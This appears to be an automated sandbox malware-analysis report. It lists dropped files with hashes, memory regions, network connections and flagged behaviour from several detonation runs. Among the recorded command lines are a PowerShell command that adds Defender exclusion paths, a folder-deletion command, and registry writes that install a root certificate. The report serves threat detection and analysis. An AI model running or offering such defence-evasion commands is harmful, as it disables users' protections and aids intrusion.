| SHA256 | d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693 |
| SHA512 | 8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe |
memory/1796-20-0x000000007303E000-0x000000007303F000-memory.dmp
memory/1796-21-0x0000000002E40000-0x0000000002E76000-memory.dmp
memory/1796-22-0x0000000005BC0000-0x00000000061E8000-memory.dmp
memory/1796-23-0x0000000073030000-0x00000000737E0000-memory.dmp
memory/1796-24-0x0000000073030000-0x00000000737E0000-memory.dmp
memory/1796-25-0x00000000059D0000-0x00000000059F2000-memory.dmp
memory/1796-26-0x0000000005A70000-0x0000000005AD6000-memory.dmp
memory/1796-27-0x0000000005AE0000-0x0000000005B46000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s0loga0c.gno.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1796-37-0x00000000061F0000-0x0000000006544000-memory.dmp
memory/1796-38-0x0000000006760000-0x000000000677E000-memory.dmp
memory/1796-39-0x00000000067F0000-0x000000000683C000-memory.dmp
memory/1796-40-0x0000000007720000-0x00000000077B6000-memory.dmp
memory/1796-41-0x0000000006C60000-0x0000000006C7A000-memory.dmp
memory/1796-42-0x0000000006CB0000-0x0000000006CD2000-memory.dmp
memory/1796-43-0x0000000007E90000-0x0000000008434000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
| MD5 | 93fde4e38a84c83af842f73b176ab8dc |
| SHA1 | e8c55cc160a0a94e404f544b22e38511b9d71da8 |
| SHA256 | fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03 |
| SHA512 | 48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec |
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe.manifest
| MD5 | 1b6de83d3f1ccabf195a98a2972c366a |
| SHA1 | 09f03658306c4078b75fa648d763df9cddd62f23 |
| SHA256 | e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724 |
| SHA512 | e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce |
C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll
| MD5 | f58866e5a48d89c883f3932c279004db |
| SHA1 | e72182e9ee4738577b01359f5acbfbbe8daa2b7f |
| SHA256 | d6f3e13dfff0a116190504efbfcbcd68f5d2183e6f89fd4c860360fba0ec8c12 |
| SHA512 | 7e76555e62281d355c2346177f60bfe2dc433145037a34cfc2f5848509401768b4db3a9fd2f6e1a1d69c5341db6a0b956abf4d975f28ee4262f1443b192fe177 |
C:\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | 8c04808e4ba12cb793cf661fbbf6c2a0 |
| SHA1 | bdfdb50c5f251628c332042f85e8dd8cf5f650e3 |
| SHA256 | a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272 |
| SHA512 | 9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f |
memory/2716-69-0x0000000006D70000-0x0000000006D8E000-memory.dmp
memory/2716-59-0x000000006F970000-0x000000006F9BC000-memory.dmp
memory/2716-71-0x0000000006DF0000-0x0000000006E93000-memory.dmp
memory/2716-58-0x0000000006DB0000-0x0000000006DE2000-memory.dmp
memory/2716-72-0x0000000007560000-0x0000000007BDA000-memory.dmp
memory/2716-73-0x0000000006F90000-0x0000000006F9A000-memory.dmp
memory/2716-74-0x0000000007120000-0x0000000007131000-memory.dmp
memory/2716-75-0x0000000007150000-0x000000000715E000-memory.dmp
memory/2716-76-0x0000000007160000-0x0000000007174000-memory.dmp
memory/2716-77-0x00000000071A0000-0x00000000071BA000-memory.dmp
memory/2716-78-0x0000000007190000-0x0000000007198000-memory.dmp
memory/4728-83-0x0000000000400000-0x00000000008F2000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\winrar.exe
| MD5 | f59f4f7bea12dd7c8d44f0a717c21c8e |
| SHA1 | 17629ccb3bd555b72a4432876145707613100b3e |
| SHA256 | f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4 |
| SHA512 | 44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c |
C:\Users\Admin\AppData\Roaming\services\01plugins17774.rar
| MD5 | 5829add10b7f66e9fb891a34faab675e |
| SHA1 | 0bd24bfa4dc7739968051d530755a3265d8a2fe4 |
| SHA256 | 2f88ec677b3c1b92c76500482f59c5b0172c44abb50d44fb0894f8d15e54b6ec |
| SHA512 | 54cb436a34d1c69eeb03d95d4fcd6ef39893de64dfd193a48f14144f9c958f44427b609c1004cca9546a3e7860dcf6acc4fbd1311f5004f71013689000d46c0a |
C:\Users\Admin\AppData\Roaming\services\plugin4559
| MD5 | 1b7cc96226d6ac15718fbc035435cdfe |
| SHA1 | 514747a446585d3922b13de79d3afecbc7d4863b |
| SHA256 | 5aec3edecf0c3dc4a49d432f4ca60397e7a83b3080d290d65c7753372b069470 |
| SHA512 | f0579757d4bc9385c6bcda0a6b8815fe9b9b6099a877f98a80850ae80d911a90ec0f3b94f86c8b2aed1a54b568fcce9c7d414332b7a673550e977e795ef65fc3 |
memory/1236-96-0x0000000004620000-0x0000000004A20000-memory.dmp
memory/1236-97-0x0000000004620000-0x0000000004A20000-memory.dmp
memory/1236-98-0x00007FF8016B0000-0x00007FF8018A5000-memory.dmp
memory/1236-100-0x0000000076270000-0x0000000076485000-memory.dmp
memory/3656-101-0x00000000010B0000-0x00000000010B9000-memory.dmp
memory/3656-103-0x0000000002BD0000-0x0000000002FD0000-memory.dmp
memory/3656-104-0x00007FF8016B0000-0x00007FF8018A5000-memory.dmp
memory/3656-106-0x0000000076270000-0x0000000076485000-memory.dmp
memory/1236-107-0x0000000000400000-0x0000000001A2F000-memory.dmp
memory/1796-108-0x000000007303E000-0x000000007303F000-memory.dmp
memory/1796-109-0x0000000073030000-0x00000000737E0000-memory.dmp
memory/592-112-0x0000000000400000-0x00000000008F2000-memory.dmp
C:\Users\Admin\AppData\Roaming\WinRAR\version.dat
| MD5 | 7f2f5f68786d3a054cc838379a41603e |
| SHA1 | 12d512018b42ac31540c95a8fae40efeb235cfbd |
| SHA256 | c50569c17480b5bfd6d9cdedb5ff44ccc467a515b1d99f30d2eec570db6fa86e |
| SHA512 | 61e0ef590c02a99e8ac7f1cd7f46190bc102ecbdedba05765cc06b83fb5df46fffc6399cbddf06281b0dc3a0d0488f31a48a79a01df22199f3acbf2cf66db749 |
C:\Users\Admin\AppData\Roaming\services\02plugins13079.rar
| MD5 | abd187f0e53c1502113774b5be2be89b |
| SHA1 | 70d90546bb191892666ba0dbc8330137f5593c67 |
| SHA256 | 763eaffad962a810443b3b47e45ba17f8d57bf1f65c21416840c6f2bbb3ce82c |
| SHA512 | 17a0c3bffdec3f38b3fe15c42608561f4bab8cbd43208c652628b603d665eb0ced9a7bc2f1479b3b33654e88cc7587fc11c4d643437eab6fef9a7ac909172460 |
memory/1796-118-0x0000000073030000-0x00000000737E0000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\2plugin29017
| MD5 | 26427f98c7f37c1472d0bb2e8fac6a19 |
| SHA1 | d1fb3f199565b9a84d39eb23da8d6c7858cda859 |
| SHA256 | 827142857439abbdcd5c849637ac98987f1b1b38c39049bb8ad10914b306150a |
| SHA512 | de610f72e71fb5a971d89cad25df789bb2aeec5d47cdf9ad7ede1301e1ec54814a4a692c391aaba681454498e45de28ae320eebe295000ae6ff6e4e8c03e7f32 |
memory/1520-123-0x00007FF8018B0000-0x00007FF8018B2000-memory.dmp
memory/1520-124-0x00007FF8018C0000-0x00007FF8018C2000-memory.dmp
memory/1520-125-0x0000000140000000-0x0000000140E43000-memory.dmp
memory/2728-129-0x0000000000400000-0x00000000008F2000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\03plugins17346.rar
| MD5 | aeac6a1a5a22e7e29423e30d6c74c679 |
| SHA1 | c6f6461b140287d073361fc184571821ccb54e90 |
| SHA256 | 8db6963e7dc66543cbe264316585e01f7cbc5014929cb614bb1b0dd847a24e85 |
| SHA512 | 9e26ac6a41ee390b1f2aaebf6d33a79e4bdc175439f396de504891f7749411f385bc92639b2b5e88efd8b3d301580b157bc0e2ed11e63a51a0b1878217e41e9b |
C:\Users\Admin\AppData\Roaming\services\3plugin14170
| MD5 | a6cb8ead79badac2f7c62036a6be1980 |
| SHA1 | 861883f46cd670ce671ffe0961ea3fe493afbc3d |
| SHA256 | 904977d248102149dd406dd63c659fc922b67b04e2d6b6a5039e0764f4fb0c04 |
| SHA512 | 5db90066b39a751c6102fef1cfc04cf2946e8742b7ce2cb3c992cb4fc1b31891112df59ee9a8fcb8cd801f391aef7fc9d8c31f93d35c6fdc230b78edd86cd11c |
memory/1348-150-0x0000000000400000-0x0000000002B8F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000012011\cb100c325f.dll
| MD5 | 502f859ec674fb1023764e93921b5542 |
| SHA1 | 4e80c651043d2dc1c682ef9fe9e5181abd399adf |
| SHA256 | ae9d87a76527f3d3df30a62db1fab2a669d73c3f3cdd3b366016142036056e40 |
| SHA512 | 83e65d572d12c4ba2278366e225a3e7842bebbc0108f3de0d319b5504d6c2d9c99157a29e476fb6c1da28f69652565f1a1fcf7b74ed3713a097de7e40d158392 |
memory/3148-161-0x0000000010000000-0x0000000010256000-memory.dmp
memory/1940-163-0x0000000000400000-0x0000000002B8F000-memory.dmp
memory/3148-164-0x0000000002570000-0x0000000002692000-memory.dmp
memory/3148-165-0x00000000026A0000-0x00000000027A4000-memory.dmp
memory/4620-168-0x00000165CBF20000-0x00000165CBF42000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8afd83b20a759f4a35366e96768d5a4e |
| SHA1 | c34c1c4aace18d07d1c0831448c44eca91b3dca1 |
| SHA256 | 26add189f804f6455f3459f6fd3d452784ee67a00ba3ec71f86d52e52a389c4c |
| SHA512 | 22332c9c91e76720ac3f1e85a343654461488ea5a769510075695ef703207ad7c632bc2513d748c253cd1c93074104a4d24497a7afcd3cbbb3d4b22fd41f6ed7 |
memory/3148-179-0x00000000026A0000-0x00000000027A4000-memory.dmp
memory/3148-177-0x00000000026A0000-0x00000000027A4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | d4d8cef58818612769a698c291ca3b37 |
| SHA1 | 54e0a6e0c08723157829cea009ec4fe30bea5c50 |
| SHA256 | 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0 |
| SHA512 | f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6 |
memory/4620-190-0x00000165CBFC0000-0x00000165CBFDC000-memory.dmp
memory/4620-191-0x00000165E4430000-0x00000165E443A000-memory.dmp
memory/4620-192-0x00000165E4440000-0x00000165E4448000-memory.dmp
memory/4620-193-0x00000165E4450000-0x00000165E445A000-memory.dmp
C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll
| MD5 | 5018b05026a59499aadb6ec08f4a0390 |
| SHA1 | e92da4c4350064d7f9dcc4afbbc48a8ed317a352 |
| SHA256 | 095ded227779ff91573f4e2174e31ded242a0c452ceefd0d1bb2761ffa19977c |
| SHA512 | 47742751f577453cb155cf7f88c23df3cd21163f1844fb14f94239fac121712320fd312b6557d173bdeb2b0b6da74cb7ab2a573aa11828e54db325c32aeacdca |
memory/3148-205-0x0000000010000000-0x0000000010256000-memory.dmp
memory/1940-206-0x0000000000400000-0x0000000002B8F000-memory.dmp
memory/1940-212-0x0000000000400000-0x0000000002B8F000-memory.dmp
memory/2476-221-0x0000000140000000-0x0000000140E43000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-22 00:08
Reported
2024-05-22 00:14
Platform
win10v2004-20240508-en
Max time kernel
141s
Max time network
164s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\HzkTNOg6s1em.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x46c 0x4c0
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.143.182.52.in-addr.arpa | udp |
Files
memory/3468-0-0x00007FF8CDE83000-0x00007FF8CDE85000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rnykb5ix.225.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3468-10-0x000001F8AFAD0000-0x000001F8AFAF2000-memory.dmp
memory/3468-11-0x00007FF8CDE80000-0x00007FF8CE941000-memory.dmp
memory/3468-12-0x00007FF8CDE80000-0x00007FF8CE941000-memory.dmp
memory/3468-13-0x00007FF8CDE80000-0x00007FF8CE941000-memory.dmp
memory/3468-16-0x00007FF8CDE80000-0x00007FF8CE941000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-22 00:08
Reported
2024-05-22 00:14
Platform
win10v2004-20240226-en
Max time kernel
144s
Max time network
175s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe | N/A |
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0280f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1780 wrote to memory of 4364 | N/A | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1780 wrote to memory of 4364 | N/A | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1780 wrote to memory of 4364 | N/A | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1780 wrote to memory of 3536 | N/A | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1780 wrote to memory of 3536 | N/A | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1780 wrote to memory of 3536 | N/A | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\cmd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4264 --field-trial-handle=2280,i,11703952675008463361,17436195144517971517,262144 --variations-seed-version /prefetch:8
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
| Country | Destination | Domain | Proto |
| GB | 23.44.234.16:80 | tcp | |
| US | 13.107.253.64:443 | tcp | |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.173.189.20.in-addr.arpa | udp |
Files
memory/4364-2-0x0000000072B6E000-0x0000000072B6F000-memory.dmp
memory/4364-3-0x00000000051A0000-0x00000000051D6000-memory.dmp
memory/4364-4-0x0000000072B60000-0x0000000073310000-memory.dmp
memory/4364-5-0x0000000072B60000-0x0000000073310000-memory.dmp
memory/4364-6-0x0000000005900000-0x0000000005F28000-memory.dmp
memory/4364-7-0x0000000005FE0000-0x0000000006002000-memory.dmp
memory/4364-8-0x0000000006080000-0x00000000060E6000-memory.dmp
memory/4364-9-0x0000000006160000-0x00000000061C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3hdtaqhf.udp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4364-19-0x00000000062D0000-0x0000000006624000-memory.dmp
memory/4364-20-0x0000000006790000-0x00000000067AE000-memory.dmp
memory/4364-21-0x00000000067E0000-0x000000000682C000-memory.dmp
memory/4364-22-0x0000000072B60000-0x0000000073310000-memory.dmp
memory/4364-23-0x0000000006D60000-0x0000000006D92000-memory.dmp
memory/4364-34-0x0000000072B60000-0x0000000073310000-memory.dmp
memory/4364-24-0x000000006F4A0000-0x000000006F4EC000-memory.dmp
memory/4364-35-0x0000000006D40000-0x0000000006D5E000-memory.dmp
memory/4364-36-0x0000000007760000-0x0000000007803000-memory.dmp
memory/4364-37-0x00000000081D0000-0x000000000884A000-memory.dmp
memory/4364-38-0x00000000078B0000-0x00000000078CA000-memory.dmp
memory/4364-39-0x0000000007920000-0x000000000792A000-memory.dmp
memory/4364-40-0x0000000007D80000-0x0000000007E16000-memory.dmp
memory/4364-41-0x0000000007CB0000-0x0000000007CC1000-memory.dmp
memory/4364-42-0x0000000007CF0000-0x0000000007CFE000-memory.dmp
memory/4364-43-0x0000000007D00000-0x0000000007D14000-memory.dmp
memory/4364-44-0x0000000007D40000-0x0000000007D5A000-memory.dmp
memory/4364-45-0x0000000007D30000-0x0000000007D38000-memory.dmp
